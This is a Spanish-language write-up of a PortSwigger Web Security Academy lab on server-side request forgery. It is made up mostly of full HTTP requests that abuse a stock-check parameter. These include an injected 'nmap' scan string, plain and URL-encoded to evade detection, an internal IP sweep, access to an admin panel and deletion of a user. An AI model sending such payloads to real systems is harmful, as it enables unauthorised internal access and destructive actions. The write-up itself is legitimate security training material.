๐ปLaboratorio: SSRF bรกsico contra otro sistema back-end
Ataques SSRF contra otros sistemas back-end
En algunos casos, el servidor de aplicaciones puede interactuar con sistemas back-end a los que los usuarios no pueden acceder directamente. Estos sistemas suelen tener direcciones IP privadas no enrutables. Los sistemas back-end normalmente estรกn protegidos por la topologรญa de la red, por lo que a menudo tienen una postura de seguridad mรกs dรฉbil. En muchos casos, los sistemas internos de back-end contienen funciones confidenciales a las que puede acceder sin autenticaciรณn cualquier persona que pueda interactuar con los sistemas.
En el ejemplo anterior, imagine que hay una interfaz administrativa en la URL de back-end https://192.168.0.68/admin. Un atacante puede enviar la siguiente solicitud para explotar la vulnerabilidad SSRF y acceder a la interfaz administrativa:
POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://192.168.0.68/admin
Laboratorio: SSRF bรกsico frente a otro sistema back-end
APRENDIZ
LABORATORIONo resuelto
Este laboratorio tiene una funciรณn de verificaciรณn de existencias que obtiene datos de un sistema interno.
Para resolver la prรกctica de laboratorio, use la funciรณn de verificaciรณn de existencias para escanear el 192.168.0.Xrango interno en busca de una interfaz de administraciรณn en el puerto 8080 y luego รบsela para eliminar el usuario carlos.
// Some code
Laboratorio: SSRF bรกsico frente a otro sistema back-end
URL DE ITEM DONDE VEMOS UNA APARENTE API DE CONTROL DE STOCK:
https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
REQUEST:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 96
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D3%26storeId%3D2
VEMOS LA URL DE CONSULTA DE BACKEND EN TEXTO PLANO:
http://192.168.0.1:8080/product/stock/check?productId=3&storeId=2
PROBAMOS HACER UN ESCANEO PARA VER LA IP PRIVADA CORRESPONDIENTE EXACTA DE LA MAQUINA BACKEND QUE MANEJA EL PANEL DE ADMIN:
REQUEST:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 32
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
stockApi=nmap -sP 192.168.1.0/24
RESPONSE:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 98
"Invalid external stock check url 'Illegal character in path at index 4: nmap -sP 192.168.1.0/24'"
PROBAMOS EVADIR DETECCION CODIFICANDO EL ESCANEO EN URL:
%6e%6d%61%70%20%2d%73%50%20%31%39%32%2e%31%36%38%2e%31%2e%30%2f%32%34
REQUEST:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 78
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
stockApi=%6e%6d%61%70%20%2d%73%50%20%31%39%32%2e%31%36%38%2e%31%2e%30%2f%32%34
RESPONSE IGUAL:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 98
"Invalid external stock check url 'Illegal character in path at index 4: nmap -sP 192.168.1.0/24'"
NOS DIMOS QEU EL SCANEO LO PUDIMOS HACER AL FINAL SOLO DESDE OTRO ENFOQUE USANDO INTRUDEER DEL MISMO BURP SUITE, ATACANDO CON SNIPER SOBRE EL ULTIMO OCTETO DE LA URL DE ADMIN Y BINGO NOS DIO QUE EL ULTIMO OCTETO DE LA MAQUINA LOCAL QUE MANEHA EL BACKEND DEL PANEL ADMIN ES LA TERMINADA EN 92:
ATAQUE SNIPER SOBRE ULTIMO OCTETO:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 38
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
stockApi=http://192.168.0.ยงnumยง:8080/admin
REQUEST CORRECTA:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 39
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
Connection: keep-alive
stockApi=http://192.168.0.92:8080/admin
REQUEST CORRECTA DEL ADMIN TARS EL ATAQUE:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 3139
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>Basic SSRF against another back-end system</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>Basic SSRF against another back-end system</h2>
<a class=link-back href='https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<section>
<h1>Users</h1>
<div>
<span>wiener - </span>
<a href="/http://192.168.0.92:8080/admin/delete?username=wiener">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/http://192.168.0.92:8080/admin/delete?username=carlos">Delete</a>
</div>
</section>
<br>
<hr>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
PROBAMOS BORRAR AHORA A CARLOS:
REQUEST:
POST /product/stock HTTP/2
Host: 0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Cookie: session=BNzmOdoi9esMqUROY4QxQ1w5RagDhWBw
Content-Length: 62
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad8007404d8f40182a270fe00ec00c9.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
stockApi=http://192.168.0.92:8080/admin/delete?username=carlos
RESPONSE:
HTTP/2 302 Found
Location: http://192.168.0.92:8080/admin
X-Frame-Options: SAMEORIGIN
Content-Length: 0
Last updated